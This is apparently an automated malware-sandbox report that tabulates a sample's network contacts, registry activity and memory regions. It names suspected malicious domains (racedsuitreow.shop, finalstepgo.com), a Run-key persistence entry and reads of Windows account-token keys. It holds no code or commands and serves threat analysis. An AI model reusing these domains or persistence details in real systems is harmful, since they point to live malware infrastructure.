1c9,sy14h,sy1c5,sy1c4,sy1c2,syno,sy1c3,sy1cb,sy1bq,sy1by,sy1bp,sy1bv,sy1br,sy17a,sy1bz,sy1bl,sy16h,sy16i,syz7,syz8,epYOx?xjs=s3
|
172.217.16.132
|
||
|
https://www.google.com/async/hpba?vet=10ahUKEwiHxL-h_OCIAxVy2AIHHQM3AsYQj-0KCBY..i&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC%2Fbr%3D1%2Frs%3DACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fck%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ,_fmt:prog,_id:_64P1ZseiHfKwi-gPg-6IsAw_8
|
172.217.16.132
|
||
|
https://ogs.google.com/widget/callout?prid=19037050
|
unknown
|
||
|
https://push.clients6.google.com/upload/
|
unknown
|
||
|
https://www.thawte.com/cps0/
|
unknown
|
||
|
https://www.google.com"
|
unknown
|
||
|
https://www.thawte.com/repository0W
|
unknown
|
||
|
http://www.google.com/doodles/celebrating-popcorn?hl=en
|
unknown
|
||
|
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=promo&rt=hpbas.5245&zx=1727366128120&opi=89978449
|
172.217.16.132
|
There are 87 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
racedsuitreow.shop
|
172.67.206.221
|
|
|
|
finalstepgo.com
|
185.255.122.133
|
|
|
|
ogs.google.com
|
unknown
|
|
|
|
apis.google.com
|
unknown
|
|
|
|
candleduseiwo.shop
|
unknown
|
|
|
|
google.com
|
216.58.206.78
|
||
|
csp.withgoogle.com
|
142.250.184.241
|
||
|
www3.l.google.com
|
142.250.184.206
|
||
|
plus.l.google.com
|
142.250.186.174
|
||
|
play.google.com
|
142.250.185.238
|
||
|
www.google.com
|
172.217.16.132
|
There are 1 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.168.2.16
|
unknown
|
unknown
|
|
|
|
172.67.206.221
|
racedsuitreow.shop
|
United States
|
|
|
|
185.255.122.133
|
finalstepgo.com
|
Netherlands
|
|
|
|
142.250.184.241
|
csp.withgoogle.com
|
United States
|
||
|
216.58.212.142
|
unknown
|
United States
|
||
|
142.250.186.174
|
plus.l.google.com
|
United States
|
||
|
192.168.2.4
|
unknown
|
unknown
|
||
|
142.250.181.238
|
unknown
|
United States
|
||
|
142.250.185.142
|
unknown
|
United States
|
||
|
142.250.186.132
|
unknown
|
United States
|
||
|
142.250.184.206
|
www3.l.google.com
|
United States
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
172.217.16.132
|
www.google.com
|
United States
|
There are 3 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
RATU0Beb
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
ApplicationFlags
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018000DDDFEBB86
|
There are 9 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
47C0000
|
direct allocation
|
page execute and read and write
|
|
|
|
134000
|
heap
|
page read and write
|
||
|
1737000
|
heap
|
page read and write
|
||
|
5AD0000
|
remote allocation
|
page read and write
|
||
|
16D9000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5BA5000
|
trusted library allocation
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
16EA000
|
heap
|
page read and write
|
||
|
5AC000
|
unkown
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
4830000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
552000
|
unkown
|
page readonly
|
||
|
4823000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1743000
|
heap
|
page read and write
|
||
|
5B1E000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
7FC0000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5C1000
|
unkown
|
page readonly
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
16FE000
|
heap
|
page read and write
|
||
|
1417000
|
heap
|
page read and write
|
||
|
172B000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1746000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
47B0000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
511F000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
595B000
|
stack
|
page read and write
|
||
|
5C0000
|
unkown
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
59C1000
|
unclassified section
|
page execute read
|
||
|
134000
|
heap
|
page read and write
|
||
|
1739000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
76DD000
|
stack
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
1732000
|
heap
|
page read and write
|
||
|
5A6E000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1692000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5AAD000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
639D000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
6B9D000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
16A6000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1319000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1790000
|
heap
|
page read and write
|
||
|
17E000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
7F3E000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
552000
|
unkown
|
page readonly
|
||
|
16BD000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5A0F000
|
unclassified section
|
page write copy
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5D9E000
|
trusted library allocation
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
5A0C000
|
unclassified section
|
page readonly
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1613000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
27AF000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
170B000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
4770000
|
trusted library allocation
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1798000
|
heap
|
page read and write
|
||
|
4820000
|
heap
|
page read and write
|
||
|
111D000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5CB000
|
unkown
|
page readonly
|
||
|
134000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
16DF000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
16A3000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1FE000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
ECD000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5960000
|
direct allocation
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
4826000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
16CB000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
16CC000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
130000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
5B8E000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5A1F000
|
unclassified section
|
page readonly
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5AC000
|
unkown
|
page write copy
|
||
|
172F000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
16BC000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1FAF000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1698000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
601000
|
unkown
|
page readonly
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1792000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1790000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
1692000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
2FAF000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
110000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5A14000
|
unclassified section
|
page read and write
|
||
|
515C000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
111D000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1BE000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
172D000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
1515000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
16E1000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5B90000
|
heap
|
page read and write
|
||
|
121B000
|
heap
|
page read and write
|
||
|
1730000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5AD0000
|
remote allocation
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
47AE000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1700000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
16FA000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
1745000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
171B000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
87CF000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
169E000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
5AD0000
|
remote allocation
|
page read and write
|
||
|
16D0000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
16F7000
|
heap
|
page read and write
|
||
|
16A3000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
5D67000
|
trusted library allocation
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
5BA000
|
unkown
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
7EDF000
|
stack
|
page read and write
|
There are 355 hidden memdumps, click here to show them.
DOM / HTML
|
URL
|
Malicious
|
|
|---|---|---|
|
https://www.google.com/
|
||
|
https://www.google.com/
|
||
|
https://www.google.com/
|
||
|
https://www.google.com/
|
||
|
https://www.google.com/
|